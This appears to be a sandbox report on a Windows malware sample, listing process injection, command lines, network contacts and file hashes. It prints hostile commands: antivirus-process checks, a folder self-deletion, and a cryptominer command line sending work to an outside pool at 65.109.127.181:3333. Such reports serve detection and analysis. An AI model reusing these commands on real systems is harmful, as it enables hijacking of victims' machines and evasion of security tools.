PID 5112 wrote to memory of 2352 N/A C:\ProgramData\CBGCBGCAFI.exe C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352 N/A C:\ProgramData\CBGCBGCAFI.exe C:\Windows\SysWOW64\ftp.exe
PID 2820 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2820 wrote to memory of 2072 N/A C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif C:\Windows\SysWOW64\cmd.exe
PID 2072 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2072 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2072 wrote to memory of 4032 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2952 wrote to memory of 4924 N/A C:\ProgramData\JKKEBGCGHI.exe C:\Windows\SysWOW64\ftp.exe
PID 5112 wrote to memory of 2352 N/A C:\ProgramData\CBGCBGCAFI.exe C:\Windows\SysWOW64\ftp.exe
PID 4924 wrote to memory of 1428 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4924 wrote to memory of 1428 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 4924 wrote to memory of 1428 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2352 wrote to memory of 4024 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2352 wrote to memory of 4024 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4924 wrote to memory of 1428 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\SysWOW64\explorer.exe
PID 2352 wrote to memory of 4024 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 2352 wrote to memory of 4024 N/A C:\Windows\SysWOW64\ftp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
PID 4024 wrote to memory of 2608 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\Setup (10).exe

"C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k copy Secretariat Secretariat.cmd & Secretariat.cmd & exit

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa.exe opssvc.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 150746

C:\Windows\SysWOW64\findstr.exe

findstr /V "reachedindicatingfindlawfu" Cologne

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b Abroad 150746\e

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

150746\Mind.pif 150746\e

C:\Windows\SysWOW64\timeout.exe

timeout 5

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

C:\ProgramData\JKKEBGCGHI.exe

"C:\ProgramData\JKKEBGCGHI.exe"

C:\ProgramData\CBGCBGCAFI.exe

"C:\ProgramData\CBGCBGCAFI.exe"

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\ftp.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEBKECFCFBGC" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe -a rx/0 --url=65.109.127.181:3333 -u PLAYA -p PLAYA -R --variant=-1 --max-cpu-usage=70 --donate-level=1 -opencl

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 WAmbXuXSzuXabiImZi.WAmbXuXSzuXabiImZi udp
US 52.111.227.14:443 tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
GB 172.217.169.67:80 c.pki.goog tcp
US 104.21.81.243:443 theemir.xyz tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 172.67.212.123:443 businessdownloads.ltd tcp
US 104.21.81.243:443 theemir.xyz tcp
US 199.232.192.193:443 i.imgur.com tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
US 104.21.81.243:443 theemir.xyz tcp
FI 135.181.22.88:80 135.181.22.88 tcp
FI 65.109.127.181:3333 tcp
US 45.152.112.146:80 proresupdate.com tcp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
US 172.67.197.250:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
N/A 224.0.0.251:5353 udp
FI 65.109.127.181:3333 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Secretariat

MD5 7f01361524f94ccde5107595e2c54200
SHA1 c1b34c5781d2f042c81c3a8128d2a9d5b7b7a084
SHA256 903bedd93e8ec45d8083f33181b8f64612c075bfddf55fc4fb5a5443f5c578dd
SHA512 bb19216799526c5c7f2bf1f29e529d63c2cd6f6cef0c9e3b236a8e90d836a655d0eb7f62a9aa91dcf8f1c8d8f0ea9753252a5e54f49768315844847196dae064

C:\Users\Admin\AppData\Local\Temp\Cologne

MD5 a7e0c610d9e51e1f07ed50a2698d841c
SHA1 856bf97f63d5b1629a73def5b539454e2bdf0925
SHA256 4458046d4cefd31f95c9844044f68b7fc95311a5e25d085a2882c6426d07977d
SHA512 60ab445f726323b9ea37eb328015dbf752065f9091d4ef19ccdf3c567e0ae731ba633a78334e245b7b5219f1580ccf8dc7790084255ae8bf143a559cbf11adc6

C:\Users\Admin\AppData\Local\Temp\Race

MD5 677c8b24ad59b6eef5dfb3faf7e0974a
SHA1 6e52ce41957b616aff5481493c30b7d84090a562
SHA256 b2f80e63c5e1073731a4656fa3e6d23d6cb7dd43d70ebea566b6bee00fee9bfd
SHA512 e013f8d3bbe9ebbf25635efb17d3554056c8318af4908825820dab0393d4ac9a26de55e4f168ba0cc84294a657680887b74b59d2b15c340b9a990021f6269c7a

C:\Users\Admin\AppData\Local\Temp\Reasons

MD5 99f7825b887660ea8f043d913522545b
SHA1 f6d36f0385ec836a40572bfcf605c8905b1a600a
SHA256 61ca2c5de8554fd7afe374c06203ea7832fdfff03f6512ef637328c66a6091a9
SHA512 ff1b9ff9aecf55b35c817e49adc0f580a45875976c462d03984eba97f93d57650da7724b42c2105eac0579c865c204e776ef762d984600c7e96fc574ace28cd2

C:\Users\Admin\AppData\Local\Temp\Estates

MD5 e3b5843f44d2382246054ea8b0706383
SHA1 a3036166a029bb1975129896e091daf40d820999
SHA256 2a790ae2e21ecf6c83b670a22509aeeca5a3ba67698cdd534817ff6e49957a84
SHA512 eac7c2bc9bfa0ad36a112b0f6878af59f9d6644e5f98842f069e741165d48d5c393790d939725c2d11606609a63ba1983c60753c3c9c4c4c273d49788190e2f8

C:\Users\Admin\AppData\Local\Temp\Changed

MD5 a2d24d16e1b5a0972e95b39e1d9a251b
SHA1 a5f7c2bcbbffef058fafe1b62c3825ce26ea5ed6
SHA256 c56805d59fc6c67afb039850fb018d90ee11ccdbecf6f7db0880f0d29e5e2a07
SHA512 8203f0ca64e37f40c923216a09216387ba9e0ef35fac7b3df1b409216ae8b4b85fb178d0622482ce04ac1cba68af938c75272b31ca3a740a1061103785e4cfad

C:\Users\Admin\AppData\Local\Temp\Lake

MD5 5ef48073ad8953dbc25cb95852577d58
SHA1 da11413d729915a120e16e15c47201ad1afd7157
SHA256 30c013ba41821acae05a5359ce75857ca66cdb03adf4560c6c0aaf2eff7b19a8
SHA512 172afe33b31994af02e8e3d13ca5a285d8869671d00fecd8e147dde26eb8e493cafbae9a60f6ef49eac8221a0e1176e625043539b2b321a934647539ae22d00d

C:\Users\Admin\AppData\Local\Temp\Timeline

MD5 3876d86dce4359c2e28a693d2c24577f
SHA1 373222b9a4d6f9116feac281725156f024a464fc
SHA256 30286f45ff66b72cc1a5c493442f5c57c0f2c7d729f663793c57c3b8dba4cf4d
SHA512 9289622b7e57f1ce380d41073ab42dc4376d3c156d8b82f60d166650a138c6190cf98ae35002ae11f5b31926dd92f3de3724d77f9e4ed2427151794a9b03fe7e

C:\Users\Admin\AppData\Local\Temp\Then

MD5 33271f00b044ed98071d84807c2158c8
SHA1 392e6351a844de7b50be3486db834321f625b7e1
SHA256 eaab5d35bea196961ffb36b423caed9d42a6cdf723759a67d5c865db6d906eb1
SHA512 0cc39c715573a5b2e81621e83dcdaa09b29530e044be223e0b62913aa77940f196429845fca46e0838781eecd6accacb7083b95bccf60f9f3fff37d096f8a788

C:\Users\Admin\AppData\Local\Temp\Fx

MD5 dfedbc594137615c08a79052a8f79e4b
SHA1 164812d22a6559b86883089a2b5b3cb2d97c320f
SHA256 7e2d5e98eefd6cc1fa44a4dda125c2d986ff0bd6b6af488213bc4992d3d6ee6e
SHA512 0ebd7c128464eaae4ba196a45201c646e669021f7a2005aa04471b521373474cc3dd8df55792585fd92bdbd6297a0fb31af18e72111fd8aa3bf39113bcb29235

C:\Users\Admin\AppData\Local\Temp\Vintage

MD5 278bae85379affaab937d9ec59eaa46d
SHA1 badcf501ff87624a68efb1ec3340d6314cc00027
SHA256 ae74ce2e63b5570786913b7f18c8bb79cd3f89d8a944a308ab036b39d7904edc
SHA512 9bfc82782f6318d4176f7fa7adad68d44421c76c179f5777e739f837d9ba5300453fbd9a1368eccbeccc24da9d1700db81f2128fde49547ed2ca86f1824ad391

C:\Users\Admin\AppData\Local\Temp\Destiny

MD5 ae51ee350f9b67d464fef7951cefe7ef
SHA1 109023e02149e2282322d285c00810a1cef0e3de
SHA256 658b597ecc79cf8cae6883b1bd37c014da410731d9ec9774b2952e8d9041793e
SHA512 bf84d806d2c10b331af8a195b654eaf7049c252db9120f72aff28cf263727b88fb432bb05f911afca7509c485f8df5b1c162ec91e4b88c76f0c19eb99f080f99

C:\Users\Admin\AppData\Local\Temp\Fighting

MD5 4a5d107b42961c4cc01ff0699b64629a
SHA1 6c31783eb1a0cf760515c21b2218f905f387c3cc
SHA256 04929738eb9987535c773a0ad904049369bc81fa6e36a35d3ff38e26d53cd696
SHA512 57dc197b44971214b61942b019609011c699f7f22972660e7f5d37e7e5cd2102501ae5d5f7b6e9031074cf9a730fbc8f128340dc640344996d0d34886f1e6b72

C:\Users\Admin\AppData\Local\Temp\Travelling

MD5 528985f09d3b53a80e38911b2086f45b
SHA1 8c2c8183f0883132dfe3d61a8afa5726cec9fefa
SHA256 79b144d737cbb862203146276c32deddcee0dcbe726cc877f40f0b0348a7f502
SHA512 1e661cf38f15abd8a852c01a1605eb19da137d8fb738885c72853c624066f1350cdb98205d3ed29ae286f4463dff2dca2881dddef8f7ac3ac6a9a017d8e7e842

C:\Users\Admin\AppData\Local\Temp\Flyer

MD5 9aec66d230b5a002f8e58e7c86fd5d11
SHA1 4486447e1c450f4c687ccef10433c428dd3e31d4
SHA256 0c8303cb00fe2838fbc27ffd8af0a0fc00045ce54efa40911b50f4e828edf1d6
SHA512 752119a11a7440a63602e77fa229d741078e3117b6e461b0d383a23f5059d0aef7b629eaf90abf5f2522997d0abab06e81bf258e8f823c22ce832fdb737e1fcc

C:\Users\Admin\AppData\Local\Temp\Worry

MD5 c715434dab2f93f0d1b6680c2b01b3fc
SHA1 355ea26f3a52b2c9abb457b9c56177a229cf9421
SHA256 05ddf26b6a74f039743ffd1d4d6152b8aa0add24da17aece71f9ccaa60538c4c
SHA512 7d39bf5a5362dd4d7ee51f4c963eb55cfdd3da46db093e288cec3db71c8b1bfaa304a64e539524fb62c397cd0a27c0890f3c93db4b591a84360bd47f23bfbc6a

C:\Users\Admin\AppData\Local\Temp\Lol

MD5 ac4c86188160adc4ea28ea1505dc18bb
SHA1 7e22e3f0d2d0aa2235b613df0413a73324dff760
SHA256 8d73e871d375f3802510b5212aba0e8ef929d62ed0396367cd3838ca7494b5b5
SHA512 a4ff143709eaddd00cd1062c940d051606039657722cc0944886a59282b8eaafed47004dcb90bf315f53acedfbdb93935fc49c2d2cf674870211854ca10b2692

C:\Users\Admin\AppData\Local\Temp\Overnight

MD5 fb39a9bcb79f50bd7cd171f3c9325b96
SHA1 922d750974483d7ae4e40d873b1124835d6a865a
SHA256 04d5051668e69769a85b314d0c46556755dd11182c2982c5fac2792d62f152c0
SHA512 fe2ebb8412e8df722c0f8fd8682198654ad19707525f8bf2068d18104163e809621fef079f8f2cb6176e9897a764816144187c2b6214d2406e6a30e581d556d7

C:\Users\Admin\AppData\Local\Temp\Fails

MD5 723321b7b3b33a2788e6cc0ba336c76d
SHA1 e17eb7189561d7f8b4fab76014124b780a3da4d7
SHA256 db1674bcd78442305a1a79773d17b61a6c5bbf830ce8e4983164c1f56198236a
SHA512 dd3c229f3b36cb07222663b8becac13df8d3a68874aee73ad20b11e18591085664ff9df27e9d84d9e9eedc00cc206db975049650f37d11bb666f1d690029c35e

C:\Users\Admin\AppData\Local\Temp\Impacts

MD5 315afae2384177766854966d0c39ead0
SHA1 baa183ea390760a631723c2f1494e0af8fb391e0
SHA256 229d27cf367f7844bdc9da75bcffc7c68a8b71aa1a31dd819f5ee4fe3bc42767
SHA512 384d2d0926af3ac4355461dd01e248d82b7f55a1a851d18c5ba892ba987472c13e8036e9e1a11806c8501595d19bc753290121903aa51d345af62381f6b815ab

C:\Users\Admin\AppData\Local\Temp\Therefore

MD5 cc32e2964f235bf9bddd71d4f7d3a9e2
SHA1 a570733cfce8d135315e86473b0ac6f6b4a4e763
SHA256 ec7c44500d11213688b83a04fb95c52b0d2c3ed2cc28d8d7e604f5b9336852f4
SHA512 3c3bea9699b4904e949c71ea40e72f39824837a9ed5251d1e1b5b857642bb2d6816c5d125255bb9272f599dd14d594fa820dacf22e8f72df424a419942e9ff8b

C:\Users\Admin\AppData\Local\Temp\Venezuela

MD5 47d9d9cdad725675c2dfa55ed4717db6
SHA1 d7bc49f9fae903accddf2da620dc5b9668f35dce
SHA256 d4be1b5210a95583cc8617ab58b5947b46abaf4f000960abcc774eee20751210
SHA512 4e12b065fc581460d137a0aebdffd3d56cfaf82b4d8be81bdfc3d4daf0897eda2230ab05166b35928b0b3c2f2cf0fb751ace6109b400d107a89797fefb5cf34e

C:\Users\Admin\AppData\Local\Temp\Ensures

MD5 5abe66470ddba2d1adc1ea359fb58b7d
SHA1 b914707d1f1b1c16dc03470cd8737a889292796c
SHA256 fecefcaab4d2499057061a01c13c3ec834ec4fcf13188e8708ad33cc3a6c6cb8
SHA512 5f95116f3f91ce9ed5d084e2c7b9df62892a633b3f45c3b714be8c34d39258d401e189297e49e15e8f497b88c2677f089473cd60e2e4806647fb7fc83471c0e2

C:\Users\Admin\AppData\Local\Temp\Noticed

MD5 90ab924a6bc6d90d922308452ce5c128
SHA1 4fd74c170817b9685b9230625fe7e47d54473829
SHA256 2ebfcd2eeaf8bc9561a1310ddc51e8759859e6523d0e8c73bb06969368ef88b2
SHA512 e93e506184d2b57abeb9601968bb0f53a06f78e8d08d3a5b5fd9f8b56a1e8709b2a48d3372e0a5d5152902a294c3b201176b35f60f7d4ee2636e15e0ca99b740

C:\Users\Admin\AppData\Local\Temp\Controversial

MD5 b8d54a8f7a866ce5950c2c67b18343ee
SHA1 95f12fbd6244ea3ecee9795ebd984a97bd056ef7
SHA256 8205f767c8dd7bb85316fe3f1988225c4bab822b39c03c412473f63f7fadddae
SHA512 1679d376069aab604f9c483623f1f7d53ca3792fa6dddb214360690186ec39662807149a7e525d797ee89d80bf742fb51a59beb0e053c4187b661bd8c954a164

C:\Users\Admin\AppData\Local\Temp\Expects

MD5 f9c59716c76e0d9aea1ed33432d0c0eb
SHA1 e017af5635025c7a5dddd5879e19f0e56cee5f63
SHA256 26deadb528299fc9567030e170fd608190da63a2cc0b8869565e4706329aee9b
SHA512 c24d790ae2ce1a66a5c9fd7eb15317cc25a2e16d28996eab7b46bea52b842ae20fcfc934edad5b70d8a0b66350db587057f346ca534e4b97fbb805693c6def61

C:\Users\Admin\AppData\Local\Temp\Banners

MD5 3f96912bd26122377de90bdf2b2adb43
SHA1 355135ae39c67bc1e8a34962db066b2d4862df22
SHA256 1025adb658535b34a6b1b162708f1d829e332bf7dfda6e389c5b676d2057b881
SHA512 6942ce7a6a09eaa4e4f897935d472d8a50cdc822d820e978eba449207ae42b65c86f5374226e4c1957ef9f8a7b3c26dfcdf45ec69edae9ce51173a0822c08174

C:\Users\Admin\AppData\Local\Temp\Tactics

MD5 2c9654e874efe5146131ed5422a715d9
SHA1 0e6d5c61f2b4821da4ecedd2a59eb6b023daa0e3
SHA256 2b35604cd27e82644be51f3266054f35b2415dd65abaa7b9b34f329fa14038e6
SHA512 bfba8ba24bc24899718d2d0b1f8948c1899c41b00624493bbd9a7c253cdee44a0f6e28d5db33473dafc3dbe6367fbdca2c062ea9cf21a15ef7ea53de8ce71c05

C:\Users\Admin\AppData\Local\Temp\Voice

MD5 c01790f3cef20061f828578069162760
SHA1 72a450b13fd37f6c5c95d94240c51354316d5962
SHA256 328d81768d3cb94a93c1d689ed4b571753d59309f44954e83ee9d3966369325b
SHA512 4350a43ddef179c199ea55acba477b57490f2434eb45cea9b3f9ebca9f4b3615c41bc38f19570bd2a1188fecc472c5406ef2d1637b16a55deb5814ab2b785fab

C:\Users\Admin\AppData\Local\Temp\Exception

MD5 2b79f9677d8663ccff67fbe4677a5065
SHA1 f63cbee04c6ae82b0f9ebaeeed8fbce7be51e7ed
SHA256 7b70774cca90f24dc9e1b889b6e277961ed7b61ed4cd8dbdd4642c65cb9b1ba9
SHA512 ce31599996e45e5aeb04b7d51e510711303471e85520986c91c4eac61a843c3d8e2b70851a1a6df0bf4b0825d417ac0b1b70822e93ab8f9523414effbef93619

C:\Users\Admin\AppData\Local\Temp\Abroad

MD5 6d4062e0f673dbe0a06ec227fe515c62
SHA1 c35c0ed445442d405ccfc78a20bbb86cf97526f6
SHA256 4e1c30452e317b04199626e8b7ca7f3b2c0c6b275715b1832533fcec030b72f4
SHA512 df953dbdb117c7ef3dbfcd266dee839f9a1ca4d50924f86d9620d0ca7a7fc9e3059caa955251e2327d46571ceb0b79dc53a2fef5b4b4f829ba33c436f982a921

C:\Users\Admin\AppData\Local\Temp\150746\Mind.pif

MD5 b06e67f9767e5023892d9698703ad098
SHA1 acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA256 8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA512 7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

memory/2820-210-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-211-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-213-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-222-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-223-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-244-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-224-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2820-245-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-261-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\AEBKECFCFBGC\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

memory/2820-262-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-284-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-285-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\JKKEBGCGHI.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2952-308-0x00000000003D0000-0x00000000008E3000-memory.dmp

C:\ProgramData\CBGCBGCAFI.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

C:\Users\Admin\AppData\Local\Temp\9513dacd

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2952-325-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/5112-324-0x00000000002F0000-0x0000000000538000-memory.dmp

memory/2952-330-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\968516cf

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/5112-332-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/5112-333-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/2820-337-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-338-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-354-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-355-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-359-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-360-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\AFCFHD

MD5 59071590099d21dd439896592338bf95
SHA1 6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c
SHA256 07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
SHA512 eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

memory/2820-376-0x0000000000F40000-0x000000000168A000-memory.dmp

memory/2820-377-0x0000000000F40000-0x000000000168A000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\CFCBFB

MD5 6aee27de60df6d69937711649fc76529
SHA1 1f6604181bce033570620eae597692103a361542
SHA256 08711ae93c31bf7c7839f92f98fc35a3369238e1e1d3331db1b2ee18bc8af164
SHA512 e298f74efc35a57812c6d69c203f54698d528410cebd9eea3044802c2b4a15860b965daf5b71c343733386abb961f73df6ce60224b88643261abf0c7814b72ec

C:\ProgramData\AEBKECFCFBGC\KJEGCF

MD5 3f50a5b944f34447d367a5a8cff2202c
SHA1 1470119d2911daec46655258de736bec57fd64d3
SHA256 a2802ce60a24ff018322f342908e349910992c82d083a304e332fd0be7ae9e2c
SHA512 5a37ef0c319009f4a21d5aa11621d769a90545ec18fbbc1cd849bed3132a4eeb46c334cd11afbf1ad213f2718c94d3e76695b459def87590c769db88c5aea286

memory/2952-390-0x0000000071FF0000-0x000000007216D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\974d65ea

MD5 c091dabb88d6c3eaa5aace99ab406b1c
SHA1 df7944e6d41b22e43f7df232a04dbc606c9be323
SHA256 d0aa929f19420e20ce33c14cb9f46ffb72256b68533a3c18ff7d542d9fd0c079
SHA512 8d7dceb9ab4fd2db532ce05ae6c056a3f95abca36740b837b032f769439595a7ac2090ec43c5bc7dd4b9f11f45212e50217890b0723169b74b196ef2fa13482b

memory/5112-393-0x0000000071FF0000-0x000000007216D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\99a4a992

MD5 8f7d74c8333c1b195ac28403a7ea7d14
SHA1 9df6d527f87b4a1a144292a93f272d9d7ff801e6
SHA256 d4d0af00988b957054d5945dc0f3bca6df2dcc0a6b349f2ca8207cd7f9705dbf
SHA512 e5124d4c3edaef68aec786b53b16cc60b32a12684cc2e96985dc2dd1efc5dbc094aaf2adc81a97f5435d479e139769c38e6319035e9639fe05bbe10712df92c9

memory/4924-396-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/2352-397-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

C:\ProgramData\AEBKECFCFBGC\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\AEBKECFCFBGC\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\AEBKECFCFBGC\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/4924-404-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/4924-413-0x0000000071FF0000-0x000000007216D000-memory.dmp

memory/4024-417-0x00007FF83F8C0000-0x00007FF840F60000-memory.dmp

memory/1428-420-0x00007FF8612E0000-0x00007FF8614E9000-memory.dmp

memory/4024-421-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1428-422-0x0000000000780000-0x00000000007F1000-memory.dmp

memory/2608-426-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-428-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-430-0x000002615B650000-0x000002615B670000-memory.dmp

memory/2608-429-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-434-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2608-433-0x0000000140000000-0x00000001407DC000-memory.dmp

